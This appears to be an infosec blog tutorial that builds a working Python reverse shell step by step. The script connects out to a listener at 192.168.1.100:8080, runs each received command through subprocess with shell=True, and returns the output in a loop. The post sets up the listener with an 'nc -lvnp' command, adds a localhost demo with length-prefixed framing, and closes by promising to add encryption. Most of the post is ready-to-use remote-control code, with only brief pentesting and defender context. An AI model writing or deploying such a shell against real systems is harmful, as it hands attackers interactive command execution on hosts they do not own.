CYBER & INFOSEC

"blogger, InfoSec specialist, super hero ... and all round good guy" 

How to write a reverse shell

A reverse shell is a network connection in which the computer you want to control (the "local computer" in this post, where the script runs) initiates an outbound connection to a listener on a remote computer and then executes whatever commands the remote computer sends back over that connection. It is called "reverse" because the direction of the connection is the opposite of a normal bind shell, where the controlling side connects in. This is useful when the local computer sits behind a firewall or NAT that blocks inbound connections but allows outbound ones, or when a local computer needs to be accessed remotely by a third party. It is also the standard way a penetration tester gets interactive access to a host that cannot be reached directly, which is exactly why defenders watch for unexpected outbound connections from hosts that normally make none.

Here is an example of how to write a simple reverse shell in Python:


First, we will need to import the necessary libraries. In this example, we will use the socket library to create the network connection and the subprocess library to execute commands:




import socket
import subprocess



Next, we will create a function to establish the reverse shell connection. This function will take two arguments: the IP address of the remote computer and the port number that we want to use for the connection:




def reverse_shell(ip, port):
    # Create a TCP socket object
    s = socket.socket()

    # Connect back to the listener on the remote computer
    s.connect((ip, port))



Once the connection is established, we can use the subprocess library to execute commands on the local computer. For example, we can use the subprocess.Popen() function to run a command received from the remote computer, with its stdout and stderr connected to pipes so that we can capture the output:





def reverse_shell(ip, port):
    # Create a TCP socket object
    s = socket.socket()

    # Connect back to the listener on the remote computer
    s.connect((ip, port))

    # Receive a command from the remote computer (recv returns bytes, so decode it)
    cmd = s.recv(1024).decode().strip()

    # Execute the command with stdout and stderr connected to pipes
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, stdin=subprocess.DEVNULL)



We can then read both pipes and send the output back to the remote computer. Two details matter here. First, read the pipes with communicate() rather than calling stdout.read() and then stderr.read() one after the other: if the command writes a lot to stderr while we are blocked reading stdout, the pipe buffer fills and the command hangs. Second, use sendall() rather than send(): send() may write only part of the buffer and return the number of bytes written, whereas sendall() keeps going until everything has been sent. Wrapping the whole thing in a loop turns a one-shot command runner into an actual shell:




def reverse_shell(ip, port):
    # Create a TCP socket object
    s = socket.socket()

    # Connect back to the listener on the remote computer
    s.connect((ip, port))

    # Keep serving commands until the remote side sends "exit" or disconnects
    while True:
        cmd = s.recv(1024).decode().strip()
        if not cmd or cmd == "exit":
            break

        # Execute the command with stdout and stderr connected to pipes
        proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.DEVNULL)
        out, err = proc.communicate()   # drain both pipes to completion, no deadlock

        # Send the output back to the remote computer (sendall writes the whole buffer)
        s.sendall(out + err)

    s.close()



Finally, we call the function and pass in the IP address and port number of the remote computer. The remote computer must already be listening on that port before the script runs (for example with nc -lvnp 8080), otherwise connect() fails with a connection refused error:




reverse_shell('192.168.1.100', 8080)
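To see the whole exchange rather than just the connect-back half, here is an added example (not code from the original post) that runs both sides on localhost in one process: the listener, which plays the part of the remote computer, and the connect-back client, which plays the part of the local computer. It adds one thing the script above does not have: a 4-byte length prefix on every message, so the listener can tell where one reply ends instead of guessing from recv() boundaries. The hostnames, the port selection and the sample commands are constructed for the demo; the framing helpers are my assumption, not part of the original script.

```python
import socket
import struct
import subprocess
import threading

# Framing helpers (added for this demo, not part of the original script).
# The original sends raw bytes, so the listener cannot tell where one reply
# ends and the next begins. A 4-byte big-endian length prefix solves that.

def send_msg(sock, data):
    sock.sendall(struct.pack("!I", len(data)) + data)

def recv_exact(sock, n):
    # recv() may return fewer bytes than asked for; loop until we have exactly n
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def recv_msg(sock):
    (length,) = struct.unpack("!I", recv_exact(sock, 4))
    return recv_exact(sock, length)

def shell_client(ip, port):
    """Runs on the local computer: connect back to the listener, then execute
    each command it sends until it says "exit" or disconnects."""
    s = socket.create_connection((ip, port))
    try:
        while True:
            cmd = recv_msg(s).decode(errors="replace")
            if cmd == "exit":
                break
            proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE, stdin=subprocess.DEVNULL)
            out, err = proc.communicate()   # drain both pipes; avoids the read() deadlock
            send_msg(s, out + err)
    except ConnectionError:
        pass                                # listener went away: exit quietly
    finally:
        s.close()

def listener_session(conn, commands):
    """Runs on the remote computer: drive one connected shell, one command at a time,
    and return the replies in order."""
    results = []
    for cmd in commands:
        send_msg(conn, cmd.encode())
        results.append(recv_msg(conn).decode(errors="replace"))
    send_msg(conn, b"exit")
    return results

def loopback_demo(commands, host="127.0.0.1"):
    """Run both sides in one process on localhost so the exchange can be observed end to end."""
    srv = socket.socket()
    srv.bind((host, 0))          # port 0: let the OS choose a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    # Start the connect-back client in a thread; in real use it runs on the other machine
    client = threading.Thread(target=shell_client, args=(host, port), daemon=True)
    client.start()
    conn, _ = srv.accept()
    try:
        return listener_session(conn, commands)
    finally:
        conn.close()
        srv.close()
        client.join(timeout=5)

if __name__ == "__main__":
    # Constructed sample commands for the demo; "echo" works on both sh and cmd.exe
    for reply in loopback_demo(["echo hello from the shell", "echo to stderr 1>&2"]):
        print(repr(reply))
```

Because the listener and the script above speak a different wire format (length-prefixed versus raw), this demo is paired with its own client rather than with a plain nc listener; the point is to show what a minimal command/response protocol needs once you move past a single command.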



Okay, let's build on what we know and get a little more complicated by adding some encryption and error checking.


